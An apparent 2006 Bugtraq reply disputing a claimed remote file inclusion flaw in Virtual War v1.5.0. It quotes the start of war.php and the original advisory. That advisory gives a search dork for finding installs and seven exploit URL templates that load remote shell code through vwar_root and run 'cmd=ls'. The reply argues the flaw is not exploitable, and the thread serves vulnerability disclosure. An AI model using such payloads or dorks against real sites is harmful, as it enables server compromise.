How should that be exploitable? $vwar_root is initialised with "./" in the first line of code after comment. *snip* <?php /* ############################################################################ * * $Id: war.php,v 1.191 2004/09/09 15:52:33 rob Exp $ * * This notice must remain untouched at all times. * * Modifications to the script, except the official addons or hacks, * without the owners permission are prohibited. * All rights reserved to their proper authors. * * --------------------------------------------- * http://www.vwar.de || Copyright (C) 2001-2004 * --------------------------------------------- * * ############################################################################ */ // get functions $vwar_root = "./"; require ($vwar_root . "includes/functions_common.php"); require ($vwar_root . "includes/functions_front.php"); -----Ursprüngliche Nachricht----- Von: AG Spider [mailto:ag-spider@xxxxxxxxxxx] Gesendet: Montag, 7. August 2006 16:45 An: bugtraq@xxxxxxxxxxxxxxxxx Betreff: Virtual War v1.5.0 Remote File Include (vwar_root) Title : Virtual War v1.5.0 Remote File Include (vwar_root) ############################################ Discovered By :::: :::: :::: AG-Spider :::: :::: :::: ---------------------------------------------------------------------------- - Class : Remote file include Rish : Danger Application : Virtual War v1.5.0 URL : www.vwar.de ---------------------------------------------------------------------------- - dork : Powered by: Virtual War v1.5.0 Exploit : http://www.$ite.com/[vwar_path]/war.php?vwar_root=[Shell-code]?&cmd=ls http://www.$ite.com/[vwar_path]/member.php?vwar_root=[Shell-code]?&cmd=ls http://www.$ite.com/[vwar_path]/calendar.php?vwar_root=[Shell-code]?&cmd=ls http://www.$ite.com/[vwar_path]/challenge.php?vwar_root=[Shell-code]?&cmd=ls http://www.$ite.com/[vwar_path]/joinus.php?vwar_root=[Shell-code]?&cmd=ls http://www.$ite.com/[vwar_path]news.php?vwar_root=[Shell-code]?&cmd=ls http://www.$ite.com/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls ---------------------------------------------------------------------------- The Arab Warriors Security Team - - -[T-A-W-S-T] - - - Muslims Hackers greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy - CrAsH_oVeR_rIdE] c0natct us : AG-Spider [ at ] HoTMail.CoM thx 2 :::::: Lezr.com & 3asfh.net _________________________________________________________________ Download the new Windows Live Toolbar, including Desktop search! http://toolbar.live.com/?mkt=en-gb
